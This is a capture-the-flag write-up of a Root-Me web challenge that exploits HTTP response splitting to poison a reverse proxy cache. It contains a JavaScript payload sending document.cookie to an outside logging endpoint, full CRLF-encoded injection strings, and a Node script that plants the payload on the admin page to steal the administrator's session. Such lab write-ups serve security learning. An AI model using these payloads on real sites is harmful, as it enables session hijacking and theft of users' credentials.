\section{Challenge}
\label{sec:challenge}
\subsection{Starting point}
\label{subsec:starting}
The Root-Me web page gives some information about the vulnerable website. We know three things:
\begin{itemize}
\item A reverse proxy cache has been installed
\item The website is still under development
\item The administrator logs in very often
\end{itemize}
This information gives us several leads. First of all, we can dig into the operation of a reverse proxy in order to find potential weaknesses or vulnerabilities. Then, if the website is under development, there may be files, resources or accesses that are not supposed to be available on the website or the server; incidentally, a website should not be reachable on the Internet before it is finished. Lastly, if the administrator logs in several times a day, we can try to dig out clues about sessions or the server cache.
Here is the base address of the vulnerable website:
\begin{center}
\url{http://challenge01.root-me.org:58002/home}
\end{center}
The \gls{ip_address} behind this Web server is \texttt{2001:bc8:35b0:c166::151}, and the service listens on port \texttt{58002} of the target machine.
Here is a preview of the home page:
\newimage{0.7}{ch_page_home.png}{Home page of the website}{ch_page_home}
We can see that the page has a link to an administration page. If we try to access this page, we obtain a \texttt{401} \gls{http} error code:
\newimage{0.7}{ch_page_admin.png}{Restricted admin page of the website}{ch_page_admin}
The first thing we noticed is that the web server does not use any secure transport protocol, such as \gls{tls}. This is a really bad practice, but it can help us in our search for vulnerabilities.
On the first visit to the website, a page asks us which language we want to use. Depending on our choice, an \gls{http} \textit{GET} parameter is sent to the web server (e.g. \texttt{user/param?lang=fr}).
\newimage{0.7}{ch_page_lang.png}{Language choice page of the website}{ch_page_lang}
This page is shown if no \gls{cookie} defining the language is stored on the client browser.
\subsection{Technological Background}
\label{subsec:background}
Based on this first contact, we will now explain the various technologies used by the website.
\subsubsection{Used languages}
The website is built using basic \gls{html}; neither \gls{javascript} nor \gls{css} is used. We can confirm this by opening the \textit{Network} tab of our browser's console when requesting the pages.
\newimage{1}{ch_console_network.png}{List of the returned Web documents}{ch_console_network}
The admin page likewise consists of a single document, but it is returned with the \texttt{401} \textit{Unauthorized} error code\footnote{\url{https://en.wikipedia.org/wiki/List_of_HTTP_status_codes}}.
Besides the website resources, the pages do not contain any code other than \gls{html}.
This limits the possible attack vectors, but \gls{javascript} code can still be injected into the website through many vectors.
\subsubsection{\Gls{cookie} usage}
By opening the browser console, we can see that two \gls{cookie}s are defined by the website: one stores the chosen language, the other holds the identifier of the user session.
\newimage{1}{ch_cookies.png}{\Gls{cookie}s defined}{ch_cookies}
A promising lead would be to try to steal the administrator's session identifier stored in the corresponding \gls{cookie}.
\subsubsection{Reverse Proxy}
As mentioned at the beginning of this section, we know that this website is using a reverse proxy. Basically, a proxy is a server that acts as an intermediary between two hosts in order to hide clients. Typically, it intercepts all requests made by the client to a server and forwards them to this server as if it had made the initial request itself. It also receives the server's responses and forwards them to the client. A proxy operates at the application layer of the \gls{osi} model\footnote{\url{https://en.wikipedia.org/wiki/OSI_model}}. This kind of proxy is also called a \textit{forward proxy}.
This intermediary hides the initial origin of the requests, i.e. the client. It can also authorize a client to access some resources, a network or servers. It can provide various services, such as:
\begin{itemize}
\item Increased client privacy
\item Additional security
\item Traffic sniffing
\item Limited access to local or global resources
\item Circumvention of network restrictions
\end{itemize}
\newimage{0.6}{ch_proxy_forward.png}{Explanation of a forward proxy}{ch_proxy_forward}
Note: a proxy can be used by one or several clients. It then acts as one virtual client for each real client.
More specifically, a reverse proxy is a server installed in front of one or several web servers. It again acts as an intermediary between clients and servers by intercepting traffic, but its goal is to avoid direct communication with one or several origin servers. The client therefore has the impression of communicating only with the proxy, even though it may receive answers from several servers. Using this kind of proxy, we can map one \gls{ip_address} with different ports to many servers.
\newpage
\newimage{0.8}{ch_proxy_reverse.png}{Explanation of a reverse proxy}{ch_proxy_reverse}
Its services can be:
\begin{itemize}
\item Protection against attacks
\item Load balancing
\item Secured transmission (via \gls{tls} or other protocols)
\item \textbf{Caching capability}
\end{itemize}
As explained by the challenge, the proxy used by the website is meant to add caching. This implies that we never talk directly to the web server, but always to the proxy.
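To fix intuition about why a shared cache matters here, the following is a minimal sketch (our own illustration, not the challenge's actual proxy code) of how a caching reverse proxy can decide between serving a cached copy and forwarding to the origin server. The cache is keyed on the request path only, which is exactly why a poisoned entry for a given page is later served to every visitor of that page:

```javascript
// Sketch of a caching reverse proxy's core decision. The cache key
// ignores cookies and other headers: every client asking for the same
// path receives the same stored body.
const cache = new Map();

function cacheKey(req) {
  // Hypothetical key derivation: method + path only.
  return req.method + " " + req.path;
}

function handle(req, fetchUpstream) {
  const key = cacheKey(req);
  if (cache.has(key)) {
    // Cache hit: the origin server is never contacted.
    return { fromCache: true, body: cache.get(key) };
  }
  // Cache miss: forward upstream (a real proxy would make an HTTP call),
  // then store the response for subsequent clients.
  const body = fetchUpstream(req);
  cache.set(key, body);
  return { fromCache: false, body };
}
```

If an attacker manages to plant a response body under the key of a popular page, every later visitor, administrator included, receives the attacker's content on a cache hit.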
\subsubsection{Server checks}
We will now use several tools in order to collect as much information as we can.
First of all, we used the \textit{Nessus} scanner\footnote{\url{https://www.tenable.com/products/nessus}} in order to get a complete overview of the host. We wanted information about the operating system, the open ports and potential vulnerabilities. An advanced scan was launched on the host, covering all \gls{tcp} ports. Here are our main findings:
\begin{itemize}
\item There are 57 open and responding \gls{tcp} ports. Some of them are used for the \gls{ssh}, \gls{smtp} or \gls{http} protocols; others are just open.
\item Some banners, corresponding to the fingerprints of services, have been found, but nothing for port \texttt{58002}.
\item The host is running Linux kernel version 2.6.
\item Some web servers are using \textit{nginx}\footnote{\url{https://nginx.com/}}. The one on port \texttt{58002} reports itself as \textit{WorldCompanyWebServer}.
\item Python is running on two other ports.
\item The reverse proxy has been detected, but without its version.
\item The \gls{http} \textit{Options allowed} header is not implemented on port \texttt{58002}.
\item Only the \textit{GET} \gls{http} method is allowed on port \texttt{58002}.
\item The \gls{smtp} server allows mail relaying.
\end{itemize}
For now, we do not think that the other ports are useful for solving the challenge; they are used for other challenges of the \textit{Root-Me} platform.
Then, we used \textit{nmap}\footnote{\url{https://nmap.org/}} to detect the machine version and enumerate the available services and their versions, which could be helpful for further research. We did not find any additional information. Nmap believes the device is an \textit{Apple} phone, which is highly unlikely.
\begin{lstlisting}[language=bash, caption=One of the used nmap command]
$ nmap -6 2001:bc8:35b0:c166::151 -A -Pn -p 58002
\end{lstlisting}
\subsubsection{\gls{http} check}
\label{subsubsec:ch_http_check}
After the general scan, we launched a web-specialized scan on port \texttt{58002}, again with \textit{Nessus}. Here are our major findings:
\begin{itemize}
\item Some \gls{cgi} scripts may not be correctly and securely sanitized, which could let us execute arbitrary \gls{html} code in the clients' browsers.
\item Some \gls{cgi}s can be vulnerable to header injection; proxy cache poisoning is therefore possible.
\item Strings passed as \gls{cgi} parameters can be read back in the response.
\item The \gls{cookie}s are marked neither \textit{Secure} nor \textit{HttpOnly}, so they are sent over unencrypted connections and can be read by malicious client-side scripts.
\item No \gls{csp} policy is defined, so cross-site scripting is possible.
\item No \textit{X-Frame-Options} \gls{http} header is present in the responses, so click-jacking attacks are possible.
\end{itemize}
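For reference, here is a sketch (our own illustration, not the challenge server's configuration) of the literal header values whose absence \textit{Nessus} reported; the session identifier is a placeholder:

```javascript
// Standard protective response headers that the scanned server does not
// send. The cookie value "<id>" is a placeholder, not a real session.
const hardened = {
  "Set-Cookie": "user_session=<id>; Secure; HttpOnly",
  "Content-Security-Policy": "default-src 'self'",
  "X-Frame-Options": "DENY",
};
console.log(hardened);
```

Their absence is precisely what makes the cookie-stealing approach described later feasible.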
\subsubsection{\gls{cgi}}
We saw in subsection \ref{subsec:starting} that some \gls{http} \textit{GET} parameters are given to the web server when choosing a language. Based on the results of the \textit{Nessus} scan, we now know that those inputs are vulnerable to header injection, so we can use this entry point to perform an injection.
\subsubsection{Final thought}
The main vectors we can deduce are that neither the \gls{cgi} capability nor the server's \gls{http} configuration is secured. Code could be injected through the proxy via one of those two weaknesses in order to be executed directly in another user's browser. Our main lead here is to try to steal the administrator's session using such an injection.
\subsection{Direction}
Based on our previous discoveries, we do not have much information about the machine itself. But we now know that the \gls{http} headers are vulnerable through the \gls{cgi} interface. The payload we will use is not specific to an operating system; it relies on weaknesses of the \gls{http} protocol and of the server's scripting system itself. We do not depend on a specific software or application version.
\subsubsection{Payload}
Because we are working in a web environment, we can use malicious \gls{javascript} code. After some research on the Web, we found how to build an efficient payload for this purpose: retrieve the \gls{cookie}s stored for the website and send them as \gls{http} \textit{GET} parameters to a website we control. We can then read the \gls{cookie}s in the request our target made.
\begin{lstlisting}[language=JavaScript, caption=Malicious payload]
const interceptor = "https://httpreq.com/throbbing-cake-4l8suii2/record";
let cookies = document.cookie;
location.replace(interceptor + "?" + cookies);
\end{lstlisting}
We use the free online service \textit{http://req}\footnote{\url{https://httpreq.com/}}, which we had already used for another project. Because we do not control any web server, this tool lets us inspect all connections made to a specific endpoint, with the details of each request. All parameters can be seen this way.
Here is a test made from a \textit{Wikipedia} page, by copy-pasting the above code into the browser's console: all unprotected \gls{cookie}s, like the ones defined by the challenge's web server, are communicated to the page. The unprotected \gls{cookie}s are those that can be read by \gls{javascript} code (no \textit{HttpOnly} flag) and that are not restricted to an encrypted channel (no \textit{Secure} flag). This is the case of the \gls{cookie}s on the challenge's website.
\newimage{1}{ch_example.png}{Example of the payload}{ch_example}
\subsubsection{\gls{http} response splitting}
The main subject of this challenge is the splitting of an \gls{http} response. We saw in \ref{subsubsec:ch_http_check} the lack of \gls{http} security mechanisms, so we can try to inject our payload directly into a request. Based on the corresponding Wikipedia page\footnote{\url{https://en.wikipedia.org/wiki/HTTP_response_splitting}}, we tried to escape the \gls{http} headers of a request made to the challenge web page.
We used the \textit{ZAP} proxy\footnote{\url{https://www.zaproxy.org/}} to capture all traffic between our computer and the reverse proxy. This lets us modify the headers of the requests before sending them to the server.
After further research, we found a website\footnote{\url{https://www.netsparker.com/blog/web-security/crlf-http-header/}} that describes how to escape the scope of \gls{http} headers using the \gls{crlf} characters. Each line of a request defines a header, and lines are separated by those end-of-line characters (CR and LF). By adding such characters as parameters at the end of the \textit{GET} request, we can take control of the page content. So we adapted the payload defined earlier and tried to inject it into a request.
By splitting the headers, we have to redefine the basic, mandatory \gls{http} headers in order to forge a valid response. Then, after those headers, we can add our payload. We used the corresponding \gls{rfc}\footnote{\url{https://tools.ietf.org/html/rfc2616}} to find those headers.
\begin{itemize}
\item \textbf{\%0D\%0A}: the end-of-line characters for escaping a header
\item \textbf{HTTP/1.1 200 OK}: the status line, defining the protocol version and the response code
\item \textbf{Host: challenge01.root-me.org:58002}: to define the initial host
\item \textbf{Last-Modified: date}: the modification timestamp, set later than the real one so that the response is cached by the reverse proxy
\item \textbf{Content-Type: text/html}: to indicate the format of the requested page
\item \textbf{Content-Length: size}: the size of the response body, i.e. the size of the payload
\item \textbf{payload}: finally, the payload itself, enclosed in \texttt{script} \gls{html} tags so that it is interpreted by the browser
\end{itemize}
All those items must then be chained together, and spaces must be encoded as the \texttt{\%20} string.
\begin{lstlisting}[caption=\gls{http} headers written manually]
&%0D%0AHTTP/1.1%20200%2OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2027%20Oct%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112
\end{lstlisting}
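As a cross-check, the same chaining can be reproduced programmatically (a sketch of our own, reusing the header values listed above); building the string this way avoids hand-encoding slips:

```javascript
// Assemble the injected response head: spaces become %20 and each header
// line is terminated by the %0D%0A (CRLF) pair. The other header
// characters are legal in a URL query string and are left as-is.
const CRLF = "%0D%0A";
const headerLines = [
  "HTTP/1.1 200 OK",
  "Host: challenge01.root-me.org:58002",
  "Last-Modified: Tue, 27 Oct 2020 20:46:59 GMT",
  "Content-Type: text/html",
  "Content-Length: 112",
];
const injected = "&" + CRLF + headerLines
  .map((line) => line.split(" ").join("%20"))
  .join(CRLF);
console.log(injected);
```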
We have to specify the size of the \gls{http} response's body. To find the size of the payload, we read the \texttt{.length} property of a new \gls{javascript} variable that includes the \texttt{<script>} tags and the complete payload without nested variables. It is easier to get the payload size this way.
\begin{lstlisting}[caption=New \gls{javascript} variable for the payload]
let payload = '<script>location.replace("https://httpreq.com/throbbing-cake-4l8suii2/record" + "?" + document.cookie);</script>';
\end{lstlisting}
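Run in any \gls{javascript} context (a quick sketch), reading that property confirms the size announced in the \textit{Content-Length} header:

```javascript
// The exact body we inject, <script> tags included; its character count
// is the value declared in the Content-Length header (112).
const payload = '<script>location.replace("https://httpreq.com/throbbing-cake-4l8suii2/record" + "?" + document.cookie);</script>';
console.log(payload.length); // 112
```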
\newpage
Now, we just have to append the content of the payload variable, as a string, to the end of the \gls{http} headers. Warning: do not forget to replace the special characters by the ones supported by the \gls{http} protocol (e.g. \%20 instead of a space). For this, we used the \textit{URLEncoder}\footnote{\url{https://www.urlencoder.io/}} online tool. A complete specification of those characters is available online\footnote{\url{https://www.html.am/reference/html-special-characters.cfm}}.
\begin{lstlisting}[caption=Final \gls{http} headers payload]
&%0D%0AHTTP/1.1%20200%2OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2027%20Oct%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%27%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E%27
\end{lstlisting}
We then tried to inject this complete payload against our target, but we ran into a few problems. First of all, we did not know that we had to include two end-of-line sequences at the end of the \gls{http} \textit{GET} parameters, just before the body. This is required by the protocol specification; otherwise, the request is not valid.
Then, we tried this on the \texttt{/home} endpoint, but we forgot that we have to go through \texttt{/user/param} in order to trigger the \gls{cgi} processing.
We also made a typo in the \gls{http} response code: we typed a \texttt{O} instead of a \texttt{0} for the \texttt{200 OK} part.
Finally, we had to remove the extra \texttt{'} characters (the \%27 strings) at the start and at the end of the payload content. They delimited the \gls{javascript} string, but are no longer required here; we had forgotten to remove them.
\begin{lstlisting}[caption=Corrected final HTTP content]
%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2017%20Nov%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E
\end{lstlisting}
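As a final sanity check (our own sketch), decoding the corrected parameter should give back the forged response head and a body whose length matches the declared \textit{Content-Length}:

```javascript
// Decode the percent-encoded injection and split it on the blank lines
// (\r\n\r\n): the first part is empty (leading CRLF CRLF), the second is
// the forged response head, the third is the injected body.
const encoded = "%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2017%20Nov%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E";
const decoded = decodeURIComponent(encoded);
const [, head, body] = decoded.split("\r\n\r\n");
console.log(head.split("\r\n")[0]); // status line of the forged response
console.log(body.length);           // must match the declared Content-Length
```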
\subsubsection{Injection demonstration}
For the demonstration, we enabled a breakpoint in \textit{ZAP} in order to catch each request made to the challenge's web server. When we visit the website from a fresh start, without any \gls{cookie}, we intercept the request sent when selecting the language and add the payload after the language parameter in the \gls{url}. We can then see that the response contains the normalized payload in its body and redirects to the home page with a \texttt{302} \gls{http} code, which means that a redirection is made to another page (\texttt{/home}). The client then sends a request to get the home page, which the server returns with the headers and body defined by the payload injected in the previous exchange.
\begin{figure}[!htb]
\begin{minipage}{0.5\textwidth}
\centering
\includegraphics[width=0.95\linewidth]{ch_demo_req1.png}
\end{minipage}\hfill
\begin{minipage}{0.5\textwidth}
\centering
\includegraphics[width=0.95\linewidth]{ch_demo_res1.png}
\end{minipage}
\caption{Demonstration of injection, initial request and response}
\label{fig:ch_demo_1}
\end{figure}
\begin{figure}[!htb]
\begin{minipage}{0.5\textwidth}
\centering
\includegraphics[width=0.95\linewidth]{ch_demo_req2.png}
\end{minipage}\hfill
\begin{minipage}{0.5\textwidth}
\centering
\includegraphics[width=0.95\linewidth]{ch_demo_res2.png}
\end{minipage}
\caption{Demonstration of injection, second request and response}
\label{fig:ch_demo_2}
\end{figure}
We have two exchanges because, once the language has been set, the web server redirects to the home page. As explained in \textit{Mozilla}'s \textit{MDN documentation}\footnote{\url{https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/302}}, the body is not changed when the second request is made for the new page. So we managed to perform the injection even with a redirection in between.
\subsubsection{Cache poisoning}
Now that the payload is ready, we have to inject it into the reverse proxy acting as a cache, and we need to find a way to do so. The objective of this attack is to send a request poisoned with a malicious payload that gets stored in the cache and delivered to other users.
First, we tried to poison the cache of the home page, but we realized that we never received the administrator's \gls{cookie}. We think that she/he only visits the administration page. So we tried to poison the cache of the admin page, but no \textit{GET} parameter passed through \gls{cgi} is interpreted on this endpoint: the payload can therefore not be processed.
We searched for many alternatives to inject the malicious code into the administration page. We looked for new \textit{GET} parameters that we could use as vectors, but did not find anything. We also tried various \gls{url} manipulations to inject the code, but none of them worked.
We finally read up on \gls{crlf} injection and \textit{\gls{http} response splitting}, which clarified the inner workings of such attacks. The first request generates two responses from the web server, the second one being fully controlled by the attacker. When a second request is then sent, the server matches it to this second, attacker-controlled \gls{http} response: the server believes that the resource requested by the second request is the one we injected with the first request carrying the payload. So, instead of just sending the first request to the server and waiting, we need to send a second request; in our case, we request the administration page. The administrator will then execute our payload when accessing his/her page, because the cache will have a hit on the administrator's request and will deliver the cached response, which we control.
\newimage{1}{ch_injection.png}{Schema of the cache poisoning}{ch_injection}
The \texttt{302} redirection made after the initial request is not involved in this kind of attack, because the server controls this exchange: it states that an additional request must be made for another resource. This is why our payload is not served for such requests. We did not include this exchange in figure \ref{fig:ch_injection} for readability.
\newpage
\subsection{The attack}
To launch the attack, we decided to create a small \textit{Node}\footnote{\url{https://nodejs.org/}} application; Node runs \gls{javascript} scripts outside of any browser. We are used to working with this technology, hence our choice. We imported the \textit{axios}\footnote{\url{https://github.com/axios/axios}} library to perform the \gls{http} requests.
For the initial request, the one carrying the payload, we need to be sure that it reaches the web server. For this, we used the \textit{Pragma}\footnote{\url{https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Pragma}} \gls{http} header to ensure that the request is submitted to the web server instead of being answered with a possibly cached copy. This header is the \gls{http} version 1.0 counterpart of \textit{Cache-Control} and is well handled by \textit{axios}.
Then, we set a timestamp in the future in the \textit{Last-Modified} \gls{http} header to make sure the cache stores the response, as it appears valid and fresh to the proxy.
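Such a future timestamp can be produced directly in \gls{javascript} (a small sketch; in our attack we simply hard-coded the date):

```javascript
// Build a Last-Modified value one day in the future. toUTCString()
// yields the HTTP date format, e.g. "Tue, 17 Nov 2020 20:46:59 GMT".
const ONE_DAY_MS = 24 * 60 * 60 * 1000;
const lastModified = new Date(Date.now() + ONE_DAY_MS).toUTCString();
console.log(lastModified);
```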
Using \gls{javascript}'s \textit{Promise} mechanism (used to sequence our asynchronous code), we made two requests: one for the payload injection and one for the cache poisoning of the admin page.
We had to include a \gls{cookie} defining a user session, otherwise the server does not react correctly to our requests. We took one generated by the server while visiting the website normally with a browser.
\newpage
\begin{lstlisting}[caption=Node application running our attack]
/* -------------------------------
   ---        IMPORTS        ---
   ------------------------------- */
const axios = require('axios').default;

/* -------------------------------
   ---          DATA         ---
   ------------------------------- */
const BASE_URL = "http://challenge01.root-me.org:58002/";
const PAYLOAD = "%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AHost:%20challenge01.root-me.org:58002%0D%0ALast-Modified:%20Tue,%2017%20Nov%202020%2020:46:59%20GMT%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20112%0D%0A%0D%0A%3Cscript%3Elocation.replace%28%22https%3A%2F%2Fhttpreq.com%2Fthrobbing-cake-4l8suii2%2Frecord%22%20%2B%20%22%3F%22%20%2B%20document.cookie%29%3B%3C%2Fscript%3E";
let cookie = "ebbbd859-1dce-438f-9b9e-46b895fcb169";
const USER_COOKIE = "user_session=" + cookie;

/* -------------------------------
   ---        PROCESS        ---
   ------------------------------- */
// Launch the initial request to the website for the code injection
axios.get(BASE_URL + 'user/param?lang=fr' + PAYLOAD, {
    headers: {
        Cookie: USER_COOKIE,
        Pragma: "no-cache"
    }
}).then(function (response) {
    console.log("Payload injected successfully to the base web page.");
    // Second request to poison the cached admin page
    axios.get(BASE_URL + 'admin', {
        headers: {
            Cookie: USER_COOKIE
        }
    }).then(function (response) {
        console.log("Admin page visited successfully.");
    }).catch(function (error) {
        console.log("An error occurred while visiting the admin page.");
    });
}).catch(function (error) {
    console.log("An error occurred while injecting the payload.");
});
\end{lstlisting}
\newpage
When executing this attack, we get the following output:
\newimage{0.6}{ch_attack_console.png}{Output of the attack on the console}{ch_attack_console}
Then, after waiting a few minutes for the bot to visit the admin page, we retrieved the administrator's \gls{cookie} containing her/his session identifier, thanks to the \textit{http://req} platform.
\newimage{1}{ch_attack_cookie.png}{\Gls{cookie} of the administrator}{ch_attack_cookie}
This session identifier being the key of the \textit{Root-Me} challenge, the challenge is now validated!
\newimage{0.5}{ch_validation.png}{Validation of the \textit{Root-Me} challenge}{ch_validation}